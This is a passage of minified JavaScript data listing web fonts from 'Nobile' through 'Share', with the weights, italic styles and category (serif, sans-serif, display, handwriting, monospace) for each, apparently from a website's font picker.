One",v:[400],f:"display"},{n:"Nobile",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Nokora",v:["100","300",400,700,900],f:"sans-serif"},{n:"Norican",v:[400],f:"handwriting"},{n:"Nosifer",v:[400],f:"display"},{n:"Notable",v:[400],f:"sans-serif"},{n:"Nothing You Could Do",v:[400],f:"handwriting"},{n:"Noticia Text",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Emoji",v:["300",400,500,600,700],f:"sans-serif"},{n:"Noto Kufi Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Music",v:[400],f:"sans-serif"},{n:"Noto Naskh Arabic",v:[400,500,600,700],f:"serif"},{n:"Noto Nastaliq Urdu",v:[400,500,600,700],f:"serif"},{n:"Noto Rashi Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Noto Sans Adlam",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Adlam Unjoined",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Anatolian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Armenian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Avestan",v:[400],f:"sans-serif"},{n:"Noto Sans Balinese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bamum",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bassa Vah",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Batak",v:[400],f:"sans-serif"},{n:"Noto Sans Bengali",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Bhaiksuki",v:[400],f:"sans-serif"},{n:"Noto Sans Brahmi",v:[400],f:"sans-serif"},{n:"Noto Sans Buginese",v:[400],f:"sans-serif"},{n:"Noto Sans Buhid",v:[400],f:"sans-serif"},{n:"Noto Sans Canadian Aboriginal",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Carian",v:[400],f:"sans-serif"},{n:"Noto Sans Caucasian Albanian",v:[400],f:"sans-serif"},{n:"Noto Sans Chakma",v:[400],f:"sans-serif"},{n:"Noto Sans Cham",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Cherokee",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Coptic",v:[400],f:"sans-serif"},{n:"Noto Sans Cuneiform",v:[400],f:"sans-serif"},{n:"Noto Sans Cypriot",v:[400],f:"sans-serif"},{n:"Noto Sans Deseret",v:[400],f:"sans-serif"},{n:"Noto Sans Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Noto Sans Duployan",v:[400],f:"sans-serif"},{n:"Noto Sans Egyptian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Elbasan",v:[400],f:"sans-serif"},{n:"Noto Sans Elymaic",v:[400],f:"sans-serif"},{n:"Noto Sans Georgian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Glagolitic",v:[400],f:"sans-serif"},{n:"Noto Sans Gothic",v:[400],f:"sans-serif"},{n:"Noto Sans Grantha",v:[400],f:"sans-serif"},{n:"Noto Sans Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Gunjala Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans HK",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Hanifi Rohingya",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Hanunoo",v:[400],f:"sans-serif"},{n:"Noto Sans Hatran",v:[400],f:"sans-serif"},{n:"Noto Sans Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Imperial Aramaic",v:[400],f:"sans-serif"},{n:"Noto Sans Indic Siyaq Numbers",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Parthian",v:[400],f:"sans-serif"},{n:"Noto Sans JP",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Javanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans KR",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Kaithi",v:[400],f:"sans-serif"},{n:"Noto Sans Kannada",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Kayah Li",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Kharoshthi",v:[400],f:"sans-serif"},{n:"Noto Sans Khmer",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Khojki",v:[400],f:"sans-serif"},{n:"Noto Sans Khudawadi",v:[400],f:"sans-serif"},{n:"Noto Sans Lao",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lepcha",v:[400],f:"sans-serif"},{n:"Noto Sans Limbu",v:[400],f:"sans-serif"},{n:"Noto Sans Linear A",v:[400],f:"sans-serif"},{n:"Noto Sans Linear B",v:[400],f:"sans-serif"},{n:"Noto Sans Lisu",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Lycian",v:[400],f:"sans-serif"},{n:"Noto Sans Lydian",v:[400],f:"sans-serif"},{n:"Noto Sans Mahajani",v:[400],f:"sans-serif"},{n:"Noto Sans Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mandaic",v:[400],f:"sans-serif"},{n:"Noto Sans Manichaean",v:[400],f:"sans-serif"},{n:"Noto Sans Marchen",v:[400],f:"sans-serif"},{n:"Noto Sans Masaram Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Math",v:[400],f:"sans-serif"},{n:"Noto Sans Mayan Numerals",v:[400],f:"sans-serif"},{n:"Noto Sans Medefaidrin",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Meetei Mayek",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Meroitic",v:[400],f:"sans-serif"},{n:"Noto Sans Miao",v:[400],f:"sans-serif"},{n:"Noto Sans Modi",v:[400],f:"sans-serif"},{n:"Noto Sans Mongolian",v:[400],f:"sans-serif"},{n:"Noto Sans Mono",v:["100","200","300",400,500,600,700,800,900],f:"monospace"},{n:"Noto Sans Mro",v:[400],f:"sans-serif"},{n:"Noto Sans Multani",v:[400],f:"sans-serif"},{n:"Noto Sans Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans NKo",v:[400],f:"sans-serif"},{n:"Noto Sans Nabataean",v:[400],f:"sans-serif"},{n:"Noto Sans New Tai Lue",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Newa",v:[400],f:"sans-serif"},{n:"Noto Sans Nushu",v:[400],f:"sans-serif"},{n:"Noto Sans Ogham",v:[400],f:"sans-serif"},{n:"Noto Sans Ol Chiki",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Old Hungarian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Italic",v:[400],f:"sans-serif"},{n:"Noto Sans Old North Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Permic",v:[400],f:"sans-serif"},{n:"Noto Sans Old Persian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Old South Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Turkic",v:[400],f:"sans-serif"},{n:"Noto Sans Oriya",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Osage",v:[400],f:"sans-serif"},{n:"Noto Sans Osmanya",v:[400],f:"sans-serif"},{n:"Noto Sans Pahawh Hmong",v:[400],f:"sans-serif"},{n:"Noto Sans Palmyrene",v:[400],f:"sans-serif"},{n:"Noto Sans Pau Cin Hau",v:[400],f:"sans-serif"},{n:"Noto Sans Phags Pa",v:[400],f:"sans-serif"},{n:"Noto Sans Phoenician",v:[400],f:"sans-serif"},{n:"Noto Sans Psalter Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Rejang",v:[400],f:"sans-serif"},{n:"Noto Sans Runic",v:[400],f:"sans-serif"},{n:"Noto Sans SC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Samaritan",v:[400],f:"sans-serif"},{n:"Noto Sans Saurashtra",v:[400],f:"sans-serif"},{n:"Noto Sans Sharada",v:[400],f:"sans-serif"},{n:"Noto Sans Shavian",v:[400],f:"sans-serif"},{n:"Noto Sans Siddham",v:[400],f:"sans-serif"},{n:"Noto Sans Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Sora Sompeng",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Soyombo",v:[400],f:"sans-serif"},{n:"Noto Sans Sundanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Syloti Nagri",v:[400],f:"sans-serif"},{n:"Noto Sans Symbols",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Symbols 2",v:[400],f:"sans-serif"},{n:"Noto Sans Syriac",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans TC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Tagalog",v:[400],f:"sans-serif"},{n:"Noto Sans Tagbanwa",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Le",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Tham",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Tai Viet",v:[400],f:"sans-serif"},{n:"Noto Sans Takri",v:[400],f:"sans-serif"},{n:"Noto Sans Tamil",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tamil Supplement",v:[400],f:"sans-serif"},{n:"Noto Sans Telugu",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thaana",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai Looped",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tifinagh",v:[400],f:"sans-serif"},{n:"Noto Sans Tirhuta",v:[400],f:"sans-serif"},{n:"Noto Sans Ugaritic",v:[400],f:"sans-serif"},{n:"Noto Sans Vai",v:[400],f:"sans-serif"},{n:"Noto Sans Wancho",v:[400],f:"sans-serif"},{n:"Noto Sans Warang Citi",v:[400],f:"sans-serif"},{n:"Noto Sans Yi",v:[400],f:"sans-serif"},{n:"Noto Sans Zanabazar Square",v:[400],f:"sans-serif"},{n:"Noto Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Serif Ahom",v:[400],f:"serif"},{n:"Noto Serif Armenian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Balinese",v:[400],f:"serif"},{n:"Noto Serif Bengali",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Dogra",v:[400],f:"serif"},{n:"Noto Serif Ethiopic",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Georgian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Grantha",v:[400],f:"serif"},{n:"Noto Serif Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif JP",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif KR",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Kannada",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Khmer",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Lao",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Nyiakeng Puachue Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif SC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif TC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Tamil",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Tangut",v:[400],f:"serif"},{n:"Noto Serif Telugu",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Thai",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Tibetan",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Yezidi",v:[400,500,600,700],f:"serif"},{n:"Noto Traditional Nushu",v:[300,400,500,600,700],f:"sans-serif"},{n:"Nova Cut",v:[400],f:"display"},{n:"Nova Flat",v:[400],f:"display"},{n:"Nova Mono",v:[400],f:"monospace"},{n:"Nova Oval",v:[400],f:"display"},{n:"Nova Round",v:[400],f:"display"},{n:"Nova Script",v:[400],f:"display"},{n:"Nova Slim",v:[400],f:"display"},{n:"Nova Square",v:[400],f:"display"},{n:"Numans",v:[400],f:"sans-serif"},{n:"Nunito",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Nunito Sans",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Nabla",v:[400],f:"display"},{n:"Noto Color Emoji",v:[400],f:"sans-serif"},{n:"Noto Sans Chorasmian",v:[400],f:"sans-serif"},{n:"Noto Sans Ethiopic",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lao Looped",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mende Kikakui",v:[400],f:"sans-serif"},{n:"Noto Sans Nag Mundari",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Nandinagari",v:[400],f:"sans-serif"},{n:"Noto Sans SignWriting",v:[400],f:"sans-serif"},{n:"Noto Sans Tangsa",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Serif HK",v:[200,300,400,500,600,700,800,900],f:"serif"},{n:"Noto Serif NP Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Oriya",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Toto",v:[400,500,600,700],f:"serif"},{n:"Nuosu SIL",v:[400],f:"serif"},{n:"Odibee Sans",v:[400],f:"display"},{n:"Odor Mean Chey",v:[400],f:"serif"},{n:"Offside",v:[400],f:"display"},{n:"Oi",v:[400],f:"display"},{n:"Old Standard TT",v:[400,"400i",700],f:"serif"},{n:"Oldenburg",v:[400],f:"display"},{n:"Ole",v:[400],f:"handwriting"},{n:"Oleo Script",v:[400,700],f:"display"},{n:"Oleo Script Swash Caps",v:[400,700],f:"display"},{n:"Oooh Baby",v:[400],f:"handwriting"},{n:"Open Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Oranienbaum",v:[400],f:"serif"},{n:"Orbitron",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Oregano",v:[400,"400i"],f:"display"},{n:"Orelega One",v:[400],f:"display"},{n:"Orienta",v:[400],f:"sans-serif"},{n:"Original Surfer",v:[400],f:"display"},{n:"Oswald",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Outfit",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Over the Rainbow",v:[400],f:"handwriting"},{n:"Overlock",v:[400,"400i",700,"700i",900,"900i"],f:"display"},{n:"Overlock SC",v:[400],f:"display"},{n:"Overpass",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Overpass Mono",v:["300",400,500,600,700],f:"monospace"},{n:"Ovo",v:[400],f:"serif"},{n:"Oxanium",v:["200","300",400,500,600,700,800],f:"display"},{n:"Oxygen",v:["300",400,700],f:"sans-serif"},{n:"Oxygen Mono",v:[400],f:"monospace"},{n:"PT Mono",v:[400],f:"monospace"},{n:"PT Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"PT Sans Caption",v:[400,700],f:"sans-serif"},{n:"PT Sans Narrow",v:[400,700],f:"sans-serif"},{n:"PT Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"PT Serif Caption",v:[400,"400i"],f:"serif"},{n:"Pacifico",v:[400],f:"handwriting"},{n:"Padauk",v:[400,700],f:"sans-serif"},{n:"Palanquin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Palanquin Dark",v:[400,500,600,700],f:"sans-serif"},{n:"Pangolin",v:[400],f:"handwriting"},{n:"Paprika",v:[400],f:"display"},{n:"Parisienne",v:[400],f:"handwriting"},{n:"Passero One",v:[400],f:"display"},{n:"Passion One",v:[400,700,900],f:"display"},{n:"Passions Conflict",v:[400],f:"handwriting"},{n:"Pathway Gothic One",v:[400],f:"sans-serif"},{n:"Patrick Hand",v:[400],f:"handwriting"},{n:"Patrick Hand SC",v:[400],f:"handwriting"},{n:"Pattaya",v:[400],f:"sans-serif"},{n:"Patua One",v:[400],f:"display"},{n:"Pavanam",v:[400],f:"sans-serif"},{n:"Paytone One",v:[400],f:"sans-serif"},{n:"Peddana",v:[400],f:"serif"},{n:"Peralta",v:[400],f:"display"},{n:"Permanent Marker",v:[400],f:"handwriting"},{n:"Petemoss",v:[400],f:"handwriting"},{n:"Petit Formal Script",v:[400],f:"handwriting"},{n:"Petrona",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Philosopher",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Piazzolla",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Piedra",v:[400],f:"display"},{n:"Pinyon Script",v:[400],f:"handwriting"},{n:"Pirata One",v:[400],f:"display"},{n:"Plaster",v:[400],f:"display"},{n:"Play",v:[400,700],f:"sans-serif"},{n:"Playball",v:[400],f:"display"},{n:"Playfair Display",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Playfair Display SC",v:[400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Plus Jakarta Sans",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Podkova",v:[400,500,600,700,800],f:"serif"},{n:"Poiret One",v:[400],f:"display"},{n:"Poller One",v:[400],f:"display"},{n:"Poly",v:[400,"400i"],f:"serif"},{n:"Pompiere",v:[400],f:"display"},{n:"Pontano Sans",v:[300,400,500,600,700],f:"sans-serif"},{n:"Poor Story",v:[400],f:"display"},{n:"Poppins",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Port Lligat Sans",v:[400],f:"sans-serif"},{n:"Port Lligat Slab",v:[400],f:"serif"},{n:"Potta One",v:[400],f:"display"},{n:"Pragati Narrow",v:[400,700],f:"sans-serif"},{n:"Praise",v:[400],f:"handwriting"},{n:"Prata",v:[400],f:"serif"},{n:"Preahvihear",v:[400],f:"sans-serif"},{n:"Press Start 2P",v:[400],f:"display"},{n:"Pridi",v:["200","300",400,500,600,700],f:"serif"},{n:"Princess Sofia",v:[400],f:"handwriting"},{n:"Prociono",v:[400],f:"serif"},{n:"Prompt",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Prosto One",v:[400],f:"display"},{n:"Proza Libre",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Public Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Puppies Play",v:[400],f:"handwriting"},{n:"Puritan",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Purple Purse",v:[400],f:"display"},{n:"Padyakke Expanded One",v:[400],f:"display"},{n:"Pathway Extreme",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Phudu",v:[300,400,500,600,700,800,900],f:"display"},{n:"Playfair",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Poltawski Nowy",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Qahiri",v:[400],f:"sans-serif"},{n:"Quando",v:[400],f:"serif"},{n:"Quantico",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Quattrocento",v:[400,700],f:"serif"},{n:"Quattrocento Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Questrial",v:[400],f:"sans-serif"},{n:"Quicksand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Quintessential",v:[400],f:"handwriting"},{n:"Qwigley",v:[400],f:"handwriting"},{n:"Qwitcher Grypen",v:[400,700],f:"handwriting"},{n:"Racing Sans One",v:[400],f:"display"},{n:"Radio Canada",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Radley",v:[400,"400i"],f:"serif"},{n:"Rajdhani",v:["300",400,500,600,700],f:"sans-serif"},{n:"Rakkas",v:[400],f:"display"},{n:"Raleway",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Raleway Dots",v:[400],f:"display"},{n:"Ramabhadra",v:[400],f:"sans-serif"},{n:"Ramaraja",v:[400],f:"serif"},{n:"Rambla",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Rammetto One",v:[400],f:"display"},{n:"Rampart One",v:[400],f:"display"},{n:"Ranchers",v:[400],f:"display"},{n:"Rancho",v:[400],f:"handwriting"},{n:"Ranga",v:[400,700],f:"display"},{n:"Rasa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Rationale",v:[400],f:"sans-serif"},{n:"Ravi Prakash",v:[400],f:"display"},{n:"Readex Pro",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Recursive",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"Red Hat Display",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Red Hat Mono",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Red Hat Text",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Red Rose",v:["300",400,500,600,700],f:"display"},{n:"Redacted",v:[400],f:"display"},{n:"Redacted Script",v:["300",400,700],f:"display"},{n:"Redressed",v:[400],f:"handwriting"},{n:"Reem Kufi",v:[400,500,600,700],f:"sans-serif"},{n:"Reenie Beanie",v:[400],f:"handwriting"},{n:"Reggae One",v:[400],f:"display"},{n:"Revalia",v:[400],f:"display"},{n:"Rhodium Libre",v:[400],f:"serif"},{n:"Ribeye",v:[400],f:"display"},{n:"Ribeye Marrow",v:[400],f:"display"},{n:"Righteous",v:[400],f:"display"},{n:"Risque",v:[400],f:"display"},{n:"Road Rage",v:[400],f:"display"},{n:"Roboto",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Roboto Condensed",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Roboto Flex",v:[400],f:"sans-serif"},{n:"Roboto Mono",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"monospace"},{n:"Roboto Serif",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Roboto Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Rochester",v:[400],f:"handwriting"},{n:"Rock Salt",v:[400],f:"handwriting"},{n:"RocknRoll One",v:[400],f:"sans-serif"},{n:"Rokkitt",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Romanesco",v:[400],f:"handwriting"},{n:"Ropa Sans",v:[400,"400i"],f:"sans-serif"},{n:"Rosario",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Rosarivo",v:[400,"400i"],f:"serif"},{n:"Rouge Script",v:[400],f:"handwriting"},{n:"Rowdies",v:["300",400,700],f:"display"},{n:"Rozha One",v:[400],f:"serif"},{n:"Rubik",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Rubik Beastly",v:[400],f:"display"},{n:"Rubik Bubbles",v:[400],f:"display"},{n:"Rubik Glitch",v:[400],f:"display"},{n:"Rubik Microbe",v:[400],f:"display"},{n:"Rubik Mono One",v:[400],f:"sans-serif"},{n:"Rubik Moonrocks",v:[400],f:"display"},{n:"Rubik Puddles",v:[400],f:"display"},{n:"Rubik Wet Paint",v:[400],f:"display"},{n:"Ruda",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Rufina",v:[400,700],f:"serif"},{n:"Ruge Boogie",v:[400],f:"handwriting"},{n:"Ruluko",v:[400],f:"sans-serif"},{n:"Rum Raisin",v:[400],f:"sans-serif"},{n:"Ruslan Display",v:[400],f:"display"},{n:"Russo One",v:[400],f:"sans-serif"},{n:"Ruthie",v:[400],f:"handwriting"},{n:"Rye",v:[400],f:"display"},{n:"Reem Kufi Fun",v:[400,500,600,700],f:"sans-serif"},{n:"Reem Kufi Ink",v:[400],f:"sans-serif"},{n:"Rubik 80s Fade",v:[400],f:"display"},{n:"Rubik Burned",v:[400],f:"display"},{n:"Rubik Dirt",v:[400],f:"display"},{n:"Rubik Distressed",v:[400],f:"display"},{n:"Rubik Gemstones",v:[400],f:"display"},{n:"Rubik Iso",v:[400],f:"display"},{n:"Rubik Marker Hatch",v:[400],f:"display"},{n:"Rubik Maze",v:[400],f:"display"},{n:"Rubik Pixels",v:[400],f:"display"},{n:"Rubik Spray Paint",v:[400],f:"display"},{n:"Rubik Storm",v:[400],f:"display"},{n:"Rubik Vinyl",v:[400],f:"display"},{n:"STIX Two Text",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Sacramento",v:[400],f:"handwriting"},{n:"Sahitya",v:[400,700],f:"serif"},{n:"Sail",v:[400],f:"display"},{n:"Saira",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Saira Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Extra Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Stencil One",v:[400],f:"display"},{n:"Salsa",v:[400],f:"display"},{n:"Sanchez",v:[400,"400i"],f:"serif"},{n:"Sancreek",v:[400],f:"display"},{n:"Sansita",v:[400,"400i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Sansita Swashed",v:["300",400,500,600,700,800,900],f:"display"},{n:"Sarabun",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Sarala",v:[400,700],f:"sans-serif"},{n:"Sarina",v:[400],f:"display"},{n:"Sarpanch",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Sassy Frass",v:[400],f:"handwriting"},{n:"Satisfy",v:[400],f:"handwriting"},{n:"Sawarabi Gothic",v:[400],f:"sans-serif"},{n:"Sawarabi Mincho",v:[400],f:"serif"},{n:"Scada",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Scheherazade New",v:[400,500,600,700],f:"serif"},{n:"Schoolbell",v:[400],f:"handwriting"},{n:"Scope One",v:[400],f:"serif"},{n:"Seaweed Script",v:[400],f:"display"},{n:"Secular One",v:[400],f:"sans-serif"},{n:"Sedgwick Ave",v:[400],f:"handwriting"},{n:"Sedgwick Ave Display",v:[400],f:"handwriting"},{n:"Sen",v:[400,700,800],f:"sans-serif"},{n:"Send Flowers",v:[400],f:"handwriting"},{n:"Sevillana",v:[400],f:"display"},{n:"Seymour One",v:[400],f:"sans-serif"},{n:"Shadows Into Light",v:[400],f:"handwriting"},{n:"Shadows Into Light Two",v:[400],f:"handwriting"},{n:"Shalimar",v:[400],f:"handwriting"},{n:"Shanti",v:[400],f:"sans-serif"},{n:"Share",v:[400,"400i",700,"700i"],f:"display"},{n:"Share 